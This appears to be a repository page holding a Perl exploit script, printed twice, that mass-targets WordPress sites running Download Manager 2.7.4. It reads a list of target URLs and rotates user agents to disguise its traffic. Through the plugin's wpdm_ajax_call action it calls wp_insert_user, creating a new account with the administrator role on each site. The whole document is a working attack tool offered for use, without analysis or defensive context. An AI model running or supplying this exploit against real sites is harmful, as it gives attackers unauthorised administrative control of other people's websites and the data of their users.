mranarshit/Wordpress Download Manager 2.7.4 Add Admin Exploiter

## Wordpress Download Manager 2.7.4 Add Admin Exploiter
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# Perl Lov3r :)
my $datestring = localtime();
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter User : ";
chomp (my $user=<>);
print "[+] Enter Password : ";
chomp (my $pass=<>);
print "[+] Started : $datestring\n";
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n";
my $i;
foreach my $web(@site){$i++;
    chomp($web);
    if($web !~ /^(http|https):\/\//){
        $web = 'http://'.$web;
    }
print "[$i] $web \n";
expadd($web);#exploiting website :)
}
sub expadd{
my $useragent = randomagent();#Get a Random User Agent
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] $_[0] \n";
   my $body = $ua->post( $_[0],
        Cookie => "",
        Content_Type => 'form-data',
        Content => [action => "wpdm_ajax_call", execute => "wp_insert_user", user_login => $user,
        user_pass => $pass, role => "administrator",]
   );
   my $html =$body->content;
   my $string_len =  length( $html );
   if ($string_len eq 0){
      print "[+] Payload successfully executed\n";
      print "[OK] Exploiting Success\n";
      print "[!] User = ".$user."\n";
      print "[!] Pass = ".$pass."\n\n";
   }
   elsif ($string_len != 0){
        print "[-] Payload failed : Not vulnerable\n";
    }
   else {
        print "[.] HTTP Error Not Found \n";
   }

}
sub flag {print "\n[+] Wordpress Download Manager 2.7.4 Add Admin Exploiter \n[*] Coder => M-A\nGreeT's : Rab3oun & All Friends :)\n\n";
}
	#!/usr/bin/perl
	use LWP::UserAgent;
	# Coded By M-A
	# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
	# Perl Lov3r :)
	my $datestring = localtime();
	my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

	sub randomagent {
	my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
	'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
	'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
	'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
	'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
	'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
	);
	my $random = $array[rand @array];
	return($random);
	}
	flag();
	print "[+] Enter List Of Target : ";
	chomp (my $list=<>);
	print "[+] Enter User : ";
	chomp (my $user=<>);
	print "[+] Enter Password : ";
	chomp (my $pass=<>);
	print "[+] Started : $datestring\n";
	open(my $arq,'<'.$list) \|\| die($!);
	my @site = <$arq>;
	@site = grep { !/^$/ } @site;
	close($arq);
	print "[".($#site+1)."] URL to test upload\n\n";
	my $i;
	foreach my $web(@site){$i++;
	chomp($web);
	if($web !~ /^(http\|https):\/\//){
	$web = 'http://'.$web;
	}
	print "[$i] $web \n";
	expadd($web);#exploiting website :)
	}
	sub expadd{
	my $useragent = randomagent();#Get a Random User Agent
	my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
	$ua->timeout(10);
	$ua->agent($useragent);
	print "[Testing] $_[0] \n";
	my $body = $ua->post( $_[0],
	Cookie => "",
	Content_Type => 'form-data',
	Content => [action => "wpdm_ajax_call", execute => "wp_insert_user", user_login => $user,
	user_pass => $pass, role => "administrator",]
	);
	my $html =$body->content;
	my $string_len = length( $html );
	if ($string_len eq 0){
	print "[+] Payload successfully executed\n";
	print "[OK] Exploiting Success\n";
	print "[!] User = ".$user."\n";
	print "[!] Pass = ".$pass."\n\n";
	}
	elsif ($string_len != 0){
	print "[-] Payload failed : Not vulnerable\n";
	}
	else {
	print "[.] HTTP Error Not Found \n";
	}

	}
	sub flag {print "\n[+] Wordpress Download Manager 2.7.4 Add Admin Exploiter \n[*] Coder => M-A\nGreeT's : Rab3oun & All Friends :)\n\n";
	}